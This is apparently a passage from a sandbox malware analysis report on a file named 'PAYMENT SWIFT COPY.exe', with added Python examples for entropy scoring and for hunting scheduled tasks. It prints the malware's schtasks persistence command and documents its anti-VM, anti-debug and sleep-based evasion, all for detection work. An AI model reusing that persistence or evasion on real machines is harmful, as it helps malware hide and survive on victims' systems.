                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, T8S8QdndXjceh7mGiN.csHigh entropy of concatenated method names: 'OEha9AGqa', 'hKmc3Gcea', 'QLTM3WmlK', 'Sil0gMUPV', 'oDKkLCb7P', 'SxNpWr5Qd', 'xnSDAbbWFlocjQYTX4', 'iBg5gCNZHsciZS4Fpd', 'KqggGtaTU', 'bbe2CkRjL'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, ykgIq6WG7bv9a2stL3.csHigh entropy of concatenated method names: 'lbyyf955uJ', 'Xt2yE9Eseo', 'TDTyrmN9DS', 'yl9ytuYklq', 'hUXyRJ1DXy', 'mlsrnJ1Npi', 'dLnrwcpfpp', 'WHkr9wMYLf', 'luLrOYrrM9', 'HNLrhsUe0L'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, gEvhqmKVs6HnbMfB1g.csHigh entropy of concatenated method names: 'Kf621BA7wa', 'wwK2rvHDM7', 'hYx2yv0U3k', 'wMm2tr0P5c', 'BcM2PvAiVy', 'xYS2R6MXib', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, PP4QjQzKR5XbP7jByn.csHigh entropy of concatenated method names: 'IJP2MbOiBh', 'BQy2dDpbOP', 'uND2kbPPVU', 'yEG2YqPME9', 'L4M2LsgvSt', 'zU12BacwMv', 'ASF2DfdCoG', 'aaa2JhRlHZ', 'Vu42mVjJy8', 'cQs2vx7YeE'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, Bq0dAq6yru0GTY6We8.csHigh entropy of concatenated method names: 'Dispose', 'RvRGhHLAsg', 'OksSLA1yTO', 'h1UXn5wZ4T', 'HmkGT8HGIb', 'djNGz3rGfQ', 'ProcessDialogKey', 'tl8SCclk5h', 'avwSGIOvMT', 'TW6SS3ADXc'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, ISRQMalEKfR4LIwPe7.csHigh entropy of concatenated method names: 'Wff1cthM4q', 'p801MNrpqB', 'w5T1diN3vd', 'bk91kxawV7', 'GOB17OCFW9', 'jjB1VDMQIa', 'yxf16AXp5D', 'be31g6FjJV', 'eSl1PxHiob', 'zh512BcFVu'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, avQnqLFlTekH9ll8IC.csHigh entropy of concatenated method names: 'J1IGt8Fq9I', 'isWGRUE1T0', 'b0hGlTJpac', 'VwRGjdqjuP', 'CHXG7EVpCa', 'e60GVBKnSR', 'YlCrG1jcLtHTEx3ZwA', 'r7WRmIq24ZjPVeGSC7', 'eryPcuITIWhkf2mrVp', 'riAGGi9num'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, N13ITUDLcClkUqkPFe.csHigh entropy of concatenated method names: 'yNPEAlaFOg', 'OXGE8AsuAr', 'qtWEQD41ZH', 'ypaEHEiE6F', 'l6GEnXRfwX', 'PBKEwIsd34', 'uMpE9JwSJG', 'eBWEOQqC1F', 'CGBEhG1wc1', 'yEQETloY7c'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, inHljhc5ZR0P7coXGSS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'giA25YDRyL', 'ICt2ikkCNQ', 'NDy2eNn1TP', 'iMt2AdsNjl', 'ty028VYdwR', 'xIl2QatxOn', 'u0E2HyevW7'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, xS9NrZ97ogRYEea3oV.csHigh entropy of concatenated method names: 'wlVtm4M6sZ', 'dectvBVcQC', 'RyKta61fU9', 'jdStcgON40', 'dC0tIKb7Tc', 'RHftMlP1Ze', 'm69t06c8nQ', 'ksTtduLkxh', 'Nlqtk5ZpUO', 'DlvtpEHRpq'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, EgUlpqHfqSfLHYoWk0.csHigh entropy of concatenated method names: 'Y8VrImx7m7', 'xRTr0nnO4U', 'ful1qtJZIS', 'Y4A1B5Ci3u', 'gdX1D6PcN0', 'Cud1xjWDJs', 'LiT1KtjKMj', 'wGw1WwAju2', 'bsJ14ueFQa', 'jgq1Frd9jt'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, kiljDFtHHOnR21nEXp.csHigh entropy of concatenated method names: 'r9K6O6ZvSe', 'fIt6Ts8mIS', 'iGZgCFT2Um', 'DZFgG4v91j', 'FDG650TbnB', 'xOr6ihdgEO', 'LIw6ejVouq', 'zpN6A8skXZ', 'Pe068SsMa1', 'kq06QYbnjo'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, PJvA2ZccqpmGc96co5h.csHigh entropy of concatenated method names: 'd8c2TdZBDG', 'SCX2zI9IXg', 'AncsC2c4hg', 'aNcsGICCin', 'bOasSNHcoj', 'nM6soW6Xil', 'fDrsZMDVte', 'sbAsfQFXeX', 'dXXsushsmT', 'IIEsEqV00Z'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, PiHwiKeblEXxf6olbN.csHigh entropy of concatenated method names: 'ToString', 'sRpV53eGe6', 'mKqVLZS7g8', 'TyfVqiC8nc', 'XvfVBNIOhx', 'GQ8VDWWNYu', 'nDyVxQoTZS', 'e81VKjc9U2', 'ea0VWjV7gd', 'rewV4d9EoN'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, T63F1I1LuuP7kaS84r.csHigh entropy of concatenated method names: 'dBtPY7TBDy', 'mnBPLXei57', 'TNnPqad45m', 'G0KPBvnSEd', 'C9RPD23EcG', 'KkJPxf2BKr', 'ThmPKsUc5N', 'D4WPWOpkFN', 'kLiP4fnMtj', 'ublPFC1TKX'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, Up5iKfZCk0jSbBntEh.csHigh entropy of concatenated method names: 'JXQ6lJyNGr', 'W176jDIcwh', 'ToString', 'ztm6uuktfD', 'C2b6EVSBNN', 'Wh961gHEkk', 'onO6rbTDPY', 'SJ16ykbOgp', 'gEN6ttxe4B', 'ked6RbeA8A'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack | High entropy of concatenated method names: the same 22 classes as in 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack above (F1hoFycFM5Y5Ngw3fwx.cs, PJXovGTZAcp6iKichi.cs, k0D0gf3cPpP3GpvRZo.cs, OMT594dTSdtC6Vaito.cs, FV0I8Vujxc8EO1wcj8.cs, swhIR3rP3Gdh5C91vH.cs, T8S8QdndXjceh7mGiN.cs, ykgIq6WG7bv9a2stL3.cs, gEvhqmKVs6HnbMfB1g.cs, PP4QjQzKR5XbP7jByn.cs, Bq0dAq6yru0GTY6We8.cs, ISRQMalEKfR4LIwPe7.cs, avQnqLFlTekH9ll8IC.cs, N13ITUDLcClkUqkPFe.cs, inHljhc5ZR0P7coXGSS.cs, xS9NrZ97ogRYEea3oV.cs, EgUlpqHfqSfLHYoWk0.cs, kiljDFtHHOnR21nEXp.cs, PJvA2ZccqpmGc96co5h.cs, PiHwiKeblEXxf6olbN.cs, T63F1I1LuuP7kaS84r.cs, Up5iKfZCk0jSbBntEh.cs), each with an identical method-name list, i.e. the same obfuscated assembly found at a third memory location
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | File created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe
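What the "High entropy of concatenated method names" hits above actually measure, as an added example that is not Joe Sandbox code: the Shannon entropy (bits per character) of a class's method names joined together. Renaming obfuscators replace identifiers with random alphanumerics, which pushes the entropy toward log2(62), about 5.95, while ordinary .NET identifiers reuse a small vocabulary and score far lower. The method names are copied from the report; the 5.0 bits/char cut-off and the "too short to judge" guard are our assumptions, since the report does not publish its own threshold.

```python
"""Entropy heuristic behind the 'High entropy of concatenated method names' hits.

Added example, not part of the Joe Sandbox report. Method names are copied
from the report; the THRESHOLD_BITS cut-off is an assumption.
"""
import math
from collections import Counter

THRESHOLD_BITS = 5.0  # assumption: the report's own threshold is not published

# From the report: class k0D0gf3cPpP3GpvRZo.cs in the unpacked .NET dump.
OBFUSCATED = ['mI5ofMYQmY', 'wNpou1NjDt', 'MySoEsTPWr', 'O9Ho1MFtN0', 'GnPorR7372',
              'wTHoyhZJgO', 'kfsotyVStc', 'd1foRqJYWw', 'FTTo3L8GKH', 'EviolnA18I']
# Also from the report: names the obfuscator had to keep because they override or
# implement framework members (IDisposable, Object, TypeConverter, Random, Control).
KEPT = ['Dispose', 'ToString', 'CanConvertFrom', 'ConvertFrom', 'ConvertTo',
        'ProcessDialogKey', 'Next', 'NextBytes']


def concat_entropy(names):
    """Shannon entropy in bits/char of the concatenated names (0.0 for empty input)."""
    text = "".join(names)
    n = len(text)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def entropy_ceiling(names):
    """Entropy cannot exceed log2(character count): a short list can never score high."""
    n = len("".join(names))
    return math.log2(n) if n else 0.0


def looks_renamed(names, threshold=THRESHOLD_BITS):
    """Flag a class whose method names reach the threshold.

    Returns False when the sample is too short to reach the threshold at all,
    so tiny classes do not produce meaningless verdicts either way.
    """
    if entropy_ceiling(names) < threshold:
        return False
    return concat_entropy(names) >= threshold


def score_classes(classes):
    """{class_name: [method names]} -> {class_name: (entropy rounded, flagged)}."""
    return {cls: (round(concat_entropy(m), 2), looks_renamed(m)) for cls, m in classes.items()}


if __name__ == "__main__":
    for cls, (bits, flagged) in score_classes({"k0D0gf3cPpP3GpvRZo": OBFUSCATED,
                                               "framework-kept": KEPT}).items():
        print(f"{cls:22s} {bits:.2f} bits/char  flagged={flagged}")
```

Classes that mix a few kept names such as 'Dispose' or 'ToString' into otherwise random lists (swhIR3rP3Gdh5C91vH.cs, Up5iKfZCk0jSbBntEh.cs above) still score high, which is why the signature fires on them too; the heuristic is a prompt to decompile and look, not proof of malice on its own, since commercial protectors produce the same pattern on legitimate software.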

                Boot Survival

                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp"
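The persistence chain shown above (a task definition written to the user's Temp directory, registered under a benign-looking "Updates\" folder, with a task name matching the file dropped to AppData\Roaming) is the logic behind the report's "Scheduled temp file as task from temp location" Sigma hit. Note that the command line names C:\Windows\System32\schtasks.exe while the process image is under SysWOW64: the 32-bit sample is subject to WOW64 file-system redirection, so hunts keyed on the exact System32 path miss it. Below is an added hunting example, not Joe Sandbox code. The process-creation records are constructed in Sysmon Event ID 1 style (the first carries the report's command line, the other two are controls), the task XML standing in for tmpFA76.tmp is constructed because the page does not show its contents, and its Exec action pointing at the dropped NCchtKNKiPqC.exe is an assumption; the list of user-writable directories is ours as well.

```python
"""Hunt for schtasks /Create persistence sourced from %TEMP%, then inspect the task.

Added example, not part of the Joe Sandbox report. Events and the task XML are
constructed; the Exec command in TASK_XML is an assumption.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed Sysmon-style process-creation records. EVENTS[0] uses the command
# line from the report; EVENTS[1] and EVENTS[2] are benign controls.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "ParentImage": r"C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks.exe /Query /TN "Updates\NCchtKNKiPqC"'},
]

# Constructed stand-in for tmpFA76.tmp (contents not shown in the report).
# ASSUMPTION: the action launches the dropped file that shares the task's name.
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe</Command></Exec>
  </Actions>
</Task>"""

# /XML argument whose path runs through the user's Temp directory (quoted or not).
XML_FROM_TEMP_RE = re.compile(r'/XML\s+"?([^"]*\\AppData\\Local\\Temp\\[^"\s]*)"?', re.IGNORECASE)
TASK_NAME_RE = re.compile(r'/TN\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
# Lower-case path fragments a standard user can write to (our list, an assumption).
USER_WRITABLE = (r"\appdata\roaming", r"\appdata\local", r"\users\public")


def schtasks_from_temp(event):
    """(task_name, xml_path) when schtasks /Create imports a definition from %TEMP%, else None.

    Matches on the image file name, not the directory, so the SysWOW64 copy is caught.
    """
    if not event.get("Image", "").lower().endswith("\\schtasks.exe"):
        return None
    cmd = event.get("CommandLine", "")
    if "/create" not in cmd.lower():
        return None
    xml = XML_FROM_TEMP_RE.search(cmd)
    if xml is None:
        return None
    name = TASK_NAME_RE.search(cmd)
    task_name = (name.group(1) or name.group(2)) if name else ""
    return task_name, xml.group(1)


def task_exec_commands(task_xml):
    """Every Actions/Exec/Command path in a Task Scheduler XML definition."""
    root = ET.fromstring(task_xml)
    return [c.text.strip() for c in root.iterfind("t:Actions/t:Exec/t:Command", TASK_NS) if c.text]


def in_user_writable_dir(path):
    """True when the executable lives somewhere a standard user can write."""
    return any(marker in path.lower() for marker in USER_WRITABLE)


def hunt(events, task_xml_by_path):
    """Chain both checks. task_xml_by_path maps a /XML path to its collected contents."""
    hits = []
    for ev in events:
        found = schtasks_from_temp(ev)
        if found is None:
            continue
        task_name, xml_path = found
        xml_text = task_xml_by_path.get(xml_path)
        actions = task_exec_commands(xml_text) if xml_text else []
        hits.append({"parent": ev.get("ParentImage", ""), "task": task_name, "xml": xml_path,
                     "actions": actions,
                     "user_writable_action": any(in_user_writable_dir(a) for a in actions)})
    return hits


if __name__ == "__main__":
    for hit in hunt(EVENTS, {r"C:\Users\user\AppData\Local\Temp\tmpFA76.tmp": TASK_XML}):
        print(hit)
```

The first stage alone reproduces the Sigma-style alert; the second stage is what turns it into a triage-ready finding, since the Temp file is usually deleted moments after registration and the only durable copy of the action is the registered task itself (readable via schtasks /Query /XML or the Task Scheduler API).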

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 identical events)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical events)
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Process information set: NOOPENFILEERRORBOX (66 identical events)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe - Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\xcopy.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match - File source: Process Memory Space: PAYMENT SWIFT COPY.exe PID: 7508, type: MEMORYSTR
                Source: Yara match - File source: Process Memory Space: NCchtKNKiPqC.exe PID: 8032, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\xcopy.exe - API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\xcopy.exe - API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\xcopy.exe - API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\xcopy.exe - API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\xcopy.exe - API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\xcopy.exe - API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\xcopy.exe - API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\xcopy.exe - API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe - Memory allocated: 1080000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe - Memory allocated: 2CD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe - Memory allocated: 12E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe - Memory allocated: 7CD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe - Memory allocated: 8CD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe - Memory allocated: 8E90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe - Memory allocated: 9E90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe - Memory allocated: A500000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe - Memory allocated: B500000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe - Memory allocated: C500000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe - Memory allocated: 1030000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe - Memory allocated: 2B20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe - Memory allocated: 4B20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe - Memory allocated: 77B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe - Memory allocated: 87B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe - Memory allocated: 8960000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe - Memory allocated: 9960000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe - Memory allocated: 9FB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe - Memory allocated: AFB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0191096E rdtsc 8_2_0191096E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6580Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1152Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8074Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 835Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 9820
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeAPI coverage: 0.7 %
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeAPI coverage: 0.4 %
                Source: C:\Windows\SysWOW64\xcopy.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe TID: 7528Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 6580 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep count: 1152 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe TID: 8156Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7324Thread sleep count: 152 > 30
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7324Thread sleep time: -304000s >= -30000s
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7324Thread sleep count: 9820 > 30
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7324Thread sleep time: -19640000s >= -30000s
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe TID: 7760Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe TID: 7760Thread sleep count: 42 > 30
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe TID: 7760Thread sleep time: -63000s >= -30000s
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe TID: 7760Thread sleep count: 44 > 30
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe TID: 7760Thread sleep time: -44000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0053C850 FindFirstFileW,FindNextFileW,FindClose,15_2_0053C850
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: NCchtKNKiPqC.exe, 00000009.00000002.1789198057.0000000000CE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: drfYhRLxnrcfFY.exe, 00000014.00000002.4140498303.0000000001559000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1739507734.0000000005DF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: xcopy.exe, 0000000F.00000002.4139981371.0000000002923000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2169577583.000001F959F4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0191096E rdtsc 8_2_0191096E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00417953 LdrLoadDll,8_2_00417953
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0198C188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01910185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01974180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CA197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194E1D0 mov eax, dword ptr fs:[00000030h]
